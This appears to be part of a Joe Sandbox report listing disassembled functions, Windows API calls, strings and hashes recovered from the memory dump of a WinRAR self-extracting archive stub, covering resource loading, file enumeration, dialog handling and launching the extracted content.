winrarsfxmappingfile.tmp, xrefs: 007CDF77
C:\Users\user\Desktop, xrefs: 007CDF33

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 3049964643-2656992072
Opcode ID: 8cdadad7f9e4011cc008a6910d08077851f08dfef367d2b8bb5ac85894203502
Instruction ID: d8a252836abe88b5228cc7c92ee8d0ea0f81ca1b0c25b2fbdf146f7d0891c93e
Opcode Fuzzy Hash: 8cdadad7f9e4011cc008a6910d08077851f08dfef367d2b8bb5ac85894203502
Instruction Fuzzy Hash: 0A61E1B1904288EBE360AB75AC8EF7B37ECFB48704F04442DFA4596291DA7C9D44C766

Function 007CA6C2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,007CB73D,00000066), ref: 007CA6D5
SizeofResource.KERNEL32(00000000,?,?,?,007CB73D,00000066), ref: 007CA6EC
LoadResource.KERNEL32(00000000,?,?,?,007CB73D,00000066), ref: 007CA703
LockResource.KERNEL32(00000000,?,?,?,007CB73D,00000066), ref: 007CA712
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,007CB73D,00000066), ref: 007CA72D
GlobalLock.KERNEL32(00000000), ref: 007CA73E
CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 007CA762
GlobalUnlock.KERNEL32(00000000), ref: 007CA7C6

Part of subcall function 007CA626: GdipAlloc.GDIPLUS(00000010), ref: 007CA62C

GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 007CA7A7
GlobalFree.KERNEL32(00000000), ref: 007CA7CD

Strings

PNG, xrefs: 007CA6C6

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
String ID: PNG
API String ID: 211097158-364855578
Opcode ID: ea641fa101edb2dc448541cc9de35c0358b794cdea5457edb63111ce7e5cde24
Instruction ID: 7404859100d92f8b509069977d05451c712754a99b1770550aa82496357cc61a
Opcode Fuzzy Hash: ea641fa101edb2dc448541cc9de35c0358b794cdea5457edb63111ce7e5cde24
Instruction Fuzzy Hash: 0F319E7560174ABFC7109F21EC8CE2B7BB9FF88766B00451DF80587620EB39D840DAA5

Function 007BA69B Relevance: 7.6, APIs: 5, Instructions: 105
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,007BA592,000000FF,?,?), ref: 007BA6C4

Part of subcall function 007BBB03: _wcslen.LIBCMT ref: 007BBB27

FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,007BA592,000000FF,?,?), ref: 007BA6F2
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,007BA592,000000FF,?,?), ref: 007BA6FE
FindNextFileW.KERNEL32(?,?,?,?,?,?,007BA592,000000FF,?,?), ref: 007BA728
GetLastError.KERNEL32(?,?,?,?,007BA592,000000FF,?,?), ref: 007BA734

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next_wcslen
String ID:
API String ID: 42610566-0
Opcode ID: 48dcf3d7528a96cf0db33c5b1af3d596dcfc23012aa6aac6ce3b762727b69c37
Instruction ID: 8611697713c45280f5377ec8308e3081a7145b4ed7d586e8f359afee289c713d
Opcode Fuzzy Hash: 48dcf3d7528a96cf0db33c5b1af3d596dcfc23012aa6aac6ce3b762727b69c37
Instruction Fuzzy Hash: 3D418276501555ABCB25EF64CCC8BE9B7B9FB48350F10419AE56DE3200DB386E90CF94

Function 007D7DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,007D7DC4,00000000,007EC300,0000000C,007D7F1B,00000000,00000002,00000000), ref: 007D7E0F
TerminateProcess.KERNEL32(00000000,?,007D7DC4,00000000,007EC300,0000000C,007D7F1B,00000000,00000002,00000000), ref: 007D7E16
ExitProcess.KERNEL32 ref: 007D7E28

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: d357f14bd4bd2307ff35d5af13b714797d60d4a90b1e8530156348f7aab5f299
Instruction ID: ac1d7f7fe763ea831214ab4f9cf08adc6f95b55d8d33d2028949b31bac33c849
Opcode Fuzzy Hash: d357f14bd4bd2307ff35d5af13b714797d60d4a90b1e8530156348f7aab5f299
Instruction Fuzzy Hash: A1E04631001188EBCF05AF24CD4DA5A3F7AEB44341B008496F8098F232DB3EDE52DA94

Function 007B848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 007B8493

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: a5fea8ff7bca08a34642584b7d7e2c1c31f574b2e65cd0b35db835fbc30f7555
Instruction ID: f9f632d01b0fce679aaaf3524f2083a9750bdcfb97b31bc18312c647927a0820
Opcode Fuzzy Hash: a5fea8ff7bca08a34642584b7d7e2c1c31f574b2e65cd0b35db835fbc30f7555
Instruction Fuzzy Hash: 39823B70904245EEDF65DF64C895BFABBBDBF05300F0841B9E9599B242CF385A84CB62

Function 007CB7E0 Relevance: 109.2, APIs: 48, Strings: 14, Instructions: 731windowfilesleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 007CB7E5

Part of subcall function 007B1316: GetDlgItem.USER32(00000000,00003021), ref: 007B135A
Part of subcall function 007B1316: SetWindowTextW.USER32(00000000,007E35F4), ref: 007B1370

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 007CB8D1
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007CB8EF
IsDialogMessageW.USER32(?,?), ref: 007CB902
TranslateMessage.USER32(?), ref: 007CB910
DispatchMessageW.USER32(?), ref: 007CB91A
GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 007CB93D
KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 007CB960
GetDlgItem.USER32(?,00000068), ref: 007CB983
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 007CB99E
SendMessageW.USER32(00000000,000000C2,00000000,007E35F4), ref: 007CB9B1

Part of subcall function 007CD453: _wcschr.LIBVCRUNTIME ref: 007CD45C
Part of subcall function 007CD453: _wcslen.LIBCMT ref: 007CD47D

SetFocus.USER32(00000000), ref: 007CB9B8
_swprintf.LIBCMT ref: 007CBA24

Part of subcall function 007B4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007B40A5

Part of subcall function 007CD4D4: GetDlgItem.USER32(00000068,0080FCB8), ref: 007CD4E8
Part of subcall function 007CD4D4: ShowWindow.USER32(00000000,00000005,?,?,?,007CAF07,00000001,?,?,007CB7B9,007E506C,0080FCB8,0080FCB8,00001000,00000000,00000000), ref: 007CD510
Part of subcall function 007CD4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 007CD51B
Part of subcall function 007CD4D4: SendMessageW.USER32(00000000,000000C2,00000000,007E35F4), ref: 007CD529
Part of subcall function 007CD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 007CD53F
Part of subcall function 007CD4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 007CD559
Part of subcall function 007CD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 007CD59D
Part of subcall function 007CD4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 007CD5AB
Part of subcall function 007CD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 007CD5BA
Part of subcall function 007CD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 007CD5E1
Part of subcall function 007CD4D4: SendMessageW.USER32(00000000,000000C2,00000000,007E43F4), ref: 007CD5F0

GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 007CBA68
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 007CBA90
GetTickCount.KERNEL32 ref: 007CBAAE
_swprintf.LIBCMT ref: 007CBAC2
GetLastError.KERNEL32(?,00000011), ref: 007CBAF4
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 007CBB43
_swprintf.LIBCMT ref: 007CBB7C
CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 007CBBD0
GetCommandLineW.KERNEL32 ref: 007CBBEA
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 007CBC47
ShellExecuteExW.SHELL32(0000003C), ref: 007CBC6F
Sleep.KERNEL32(00000064), ref: 007CBCB9
UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 007CBCE2
CloseHandle.KERNEL32(00000000), ref: 007CBCEB
_swprintf.LIBCMT ref: 007CBD1E
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 007CBD7D
SetDlgItemTextW.USER32(?,00000065,007E35F4), ref: 007CBD94
GetDlgItem.USER32(?,00000065), ref: 007CBD9D
GetWindowLongW.USER32(00000000,000000F0), ref: 007CBDAC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 007CBDBB
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 007CBE68
_wcslen.LIBCMT ref: 007CBEBE
_swprintf.LIBCMT ref: 007CBEE8
SendMessageW.USER32(?,00000080,00000001,?), ref: 007CBF32
SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 007CBF4C
GetDlgItem.USER32(?,00000068), ref: 007CBF55
SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 007CBF6B
GetDlgItem.USER32(?,00000066), ref: 007CBF85
SetWindowTextW.USER32(00000000,007FA472), ref: 007CBFA7
SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 007CC007
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 007CC01A
DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 007CC0BD
EnableWindow.USER32(00000000,00000000), ref: 007CC197
SendMessageW.USER32(?,00000111,00000001,00000000), ref: 007CC1D9

Part of subcall function 007CC73F: __EH_prolog.LIBCMT ref: 007CC744

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 007CC1FD

Strings

"%s"%s, xrefs: 007CBD0D
@, xrefs: 007CBB91
<, xrefs: 007CBB84
h|, xrefs: 007CBCA5
^|, xrefs: 007CC1E1
STARTDLG, xrefs: 007CB801
winrarsfxmappingfile.tmp, xrefs: 007CBBA6
PDGu<|, xrefs: 007CBC6F
__tmp_rar_sfx_access_check_%u, xrefs: 007CBAB5
Q~, xrefs: 007CBBBC
LICENSEDLG, xrefs: 007CC0B2
-el -s2 "-d%s" "-sp%s", xrefs: 007CBB6B
C:\Users\user\Desktop, xrefs: 007CBBC9
%s, xrefs: 007CBED8

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l_wcschr
String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$PDGu<|$STARTDLG$^|$__tmp_rar_sfx_access_check_%u$h|$winrarsfxmappingfile.tmp$Q~
API String ID: 3829768659-2906318319
Opcode ID: 057fa0f3c2a5f852fbf13b7e47ccf991e2862967597078f9b341c0e87bcabcc8
Instruction ID: 15a3e90d676307253761efa3b35829fa09d4ba518c733037dcd52a6f47aa9c8f
Opcode Fuzzy Hash: 057fa0f3c2a5f852fbf13b7e47ccf991e2862967597078f9b341c0e87bcabcc8
Instruction Fuzzy Hash: 9342E6B1944288FAEB229BB09C4EFFE776CAB05704F04815DF644A61D2CB7C5E44CB66

Function 007C0863 Relevance: 98.3, APIs: 23, Strings: 33, Instructions: 316
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 007C087C
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 007C088E
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 007C08BF
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 007C0B69
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007C0B83
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 007C0B93
ReadFile.KERNEL32(00000000,?,00007FFE,|<~,00000000), ref: 007C0BB1
CloseHandle.KERNEL32(00000000), ref: 007C0C09
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 007C0C1E
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<~,?,00000000,?,00000800), ref: 007C0C72
GetFileAttributesW.KERNELBASE(?,?,|<~,00000800,?,00000000,?,00000800), ref: 007C0C9C
GetFileAttributesW.KERNEL32(?,?,D=~,00000800), ref: 007C0CD8

Part of subcall function 007C081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 007C0836
Part of subcall function 007C081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,007BF2D8,Crypt32.dll,00000000,007BF35C,?,?,007BF33E,?,?,?), ref: 007C0858

_swprintf.LIBCMT ref: 007C0D4A
_swprintf.LIBCMT ref: 007C0D96

Part of subcall function 007B4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007B40A5

AllocConsole.KERNEL32 ref: 007C0D9E
GetCurrentProcessId.KERNEL32 ref: 007C0DA8
AttachConsole.KERNEL32(00000000), ref: 007C0DAF
_wcslen.LIBCMT ref: 007C0DC4
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 007C0DD5
WriteConsoleW.KERNEL32(00000000), ref: 007C0DDC
Sleep.KERNEL32(00002710), ref: 007C0DE7
FreeConsole.KERNEL32 ref: 007C0DED
ExitProcess.KERNEL32 ref: 007C0DF5

Strings

|@~, xrefs: 007C0A77
,<~, xrefs: 007C08E7
T=~, xrefs: 007C093F
uxtheme.dll, xrefs: 007C0D17
d?~, xrefs: 007C09FE
<~, xrefs: 007C0917
H@~, xrefs: 007C0A61
H?~, xrefs: 007C09F3
dA~, xrefs: 007C0AE5
h>~, xrefs: 007C099F
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 007C0D84
@~, xrefs: 007C0AAE
SetDllDirectoryW, xrefs: 007C0888
kernel32, xrefs: 007C0873
>~, xrefs: 007C09C7
DXGIDebug.dll, xrefs: 007C08FC, 007C0C5E
(=~, xrefs: 007C092F
A~, xrefs: 007C0B1C
?~, xrefs: 007C0A35
P>~, xrefs: 007C0997
8>~, xrefs: 007C098F
D=~, xrefs: 007C0CB9, 007C0CC9
|?~, xrefs: 007C0A09
0A~, xrefs: 007C0ACF
,@~, xrefs: 007C0A56
|<~, xrefs: 007C0B9E, 007C0BA2
`@~, xrefs: 007C0A6C
SetDefaultDllDirectories, xrefs: 007C08B9
HA~, xrefs: 007C0ADA
h=~, xrefs: 007C0947
0?~, xrefs: 007C09E8
4B~, xrefs: 007C0B3D
dwmapi.dll, xrefs: 007C0927, 007C0D0D

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
String ID: (=~$,<~$,@~$0?~$0A~$4B~$8>~$D=~$DXGIDebug.dll$H?~$H@~$HA~$P>~$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=~$`@~$d?~$dA~$dwmapi.dll$h=~$h>~$kernel32$uxtheme.dll$|<~$|?~$|@~$<~$>~$?~$@~$A~
API String ID: 1207345701-447490224
Opcode ID: d91c2cb581461dd3720439ca932246d5baf1c97b5efc3bf7d924fdacf5f5d824
Instruction ID: 3249dadd8b8751ef99baa8908f9e1d37a951cfc6eab3bfaac1a61493c7fd62c6
Opcode Fuzzy Hash: d91c2cb581461dd3720439ca932246d5baf1c97b5efc3bf7d924fdacf5f5d824
Instruction Fuzzy Hash: 3FD160B110A3C4EBD731DF51888DB9FBBE8BB88704F50492DF2859B150D77C86488BA6

Function 007CC73F Relevance: 51.2, APIs: 23, Strings: 6, Instructions: 428
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 007CC744

Part of subcall function 007CB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 007CB3FB

Part of subcall function 007CAF98: _wcschr.LIBVCRUNTIME ref: 007CB033

_wcslen.LIBCMT ref: 007CCA0A
_wcslen.LIBCMT ref: 007CCA13
SetWindowTextW.USER32(?,?), ref: 007CCA71
_wcslen.LIBCMT ref: 007CCAB3
_wcsrchr.LIBVCRUNTIME ref: 007CCBFB
GetDlgItem.USER32(?,00000066), ref: 007CCC36
SetWindowTextW.USER32(00000000,?), ref: 007CCC46
SendMessageW.USER32(00000000,00000143,00000000,007FA472), ref: 007CCC54
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 007CCC7F

Strings

ProgramFilesDir, xrefs: 007CCB45
Software\Microsoft\Windows\CurrentVersion, xrefs: 007CCB1A
<|, xrefs: 007CC909
%s.%d.tmp, xrefs: 007CC940
|, xrefs: 007CCB24
<br>, xrefs: 007CC9D4

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
String ID: %s.%d.tmp$<br>$<|$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$|
API String ID: 986293930-172502539
Opcode ID: 828a3757c45bb034ac50111a4b65b5da627ce327bff92c902a29f1496e1c3837
Instruction ID: 66c4829088b17854a1ccfbe0179387dc10b426155cacad256c78f22e1759c413
Opcode Fuzzy Hash: 828a3757c45bb034ac50111a4b65b5da627ce327bff92c902a29f1496e1c3837
Instruction Fuzzy Hash: BDE147B2900158EADB25DBA4DD49FEE73BCAF04350F4480AEF649E7141EB789F448B61

Function 007BDA67 Relevance: 26.9, APIs: 5, Strings: 10, Instructions: 663COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 007BDA70
_wcschr.LIBVCRUNTIME ref: 007BDA91
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 007BDAAC

Part of subcall function 007BC29A: _wcslen.LIBCMT ref: 007BC2A2

Part of subcall function 007C05DA: _wcslen.LIBCMT ref: 007C05E0

Part of subcall function 007C1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,007BBAE9,00000000,?,?,?,0001048C), ref: 007C1BA0

_wcslen.LIBCMT ref: 007BDDE9
__fprintf_l.LIBCMT ref: 007BDF1C

Strings

,, xrefs: 007BDF57
*messages***, xrefs: 007BDBC1
RTL, xrefs: 007BDEDE
$%s:, xrefs: 007BDEFF
9~, xrefs: 007BDDD0
*messages***, xrefs: 007BDBFA
, xrefs: 007BDD6C
@%s:, xrefs: 007BDF06, 007BDF12
a, xrefs: 007BDC16
R, xrefs: 007BDC0C

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$9~
API String ID: 557298264-186921005
Opcode ID: 1b3743c9c423dfaa951f35059556ef103ceeba1a354392df20cbaa9fbb490d7e
Instruction ID: c2632ec5066d77508552f5768b42e7224086570f45cba12f0d3120d1c22bf19a
Opcode Fuzzy Hash: 1b3743c9c423dfaa951f35059556ef103ceeba1a354392df20cbaa9fbb490d7e
Instruction Fuzzy Hash: 9332C071900218DBCF24EF68C849BEA77B5FF08704F50456AFA0697281EBB9DD85CB90

Function 007CD4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 007CB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 007CB579
Part of subcall function 007CB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007CB58A
Part of subcall function 007CB568: IsDialogMessageW.USER32(0001048C,?), ref: 007CB59E
Part of subcall function 007CB568: TranslateMessage.USER32(?), ref: 007CB5AC
Part of subcall function 007CB568: DispatchMessageW.USER32(?), ref: 007CB5B6

GetDlgItem.USER32(00000068,0080FCB8), ref: 007CD4E8
ShowWindow.USER32(00000000,00000005,?,?,?,007CAF07,00000001,?,?,007CB7B9,007E506C,0080FCB8,0080FCB8,00001000,00000000,00000000), ref: 007CD510
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 007CD51B
SendMessageW.USER32(00000000,000000C2,00000000,007E35F4), ref: 007CD529
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 007CD53F
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 007CD559
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 007CD59D
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 007CD5AB
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 007CD5BA
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 007CD5E1
SendMessageW.USER32(00000000,000000C2,00000000,007E43F4), ref: 007CD5F0

Strings

\, xrefs: 007CD549

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
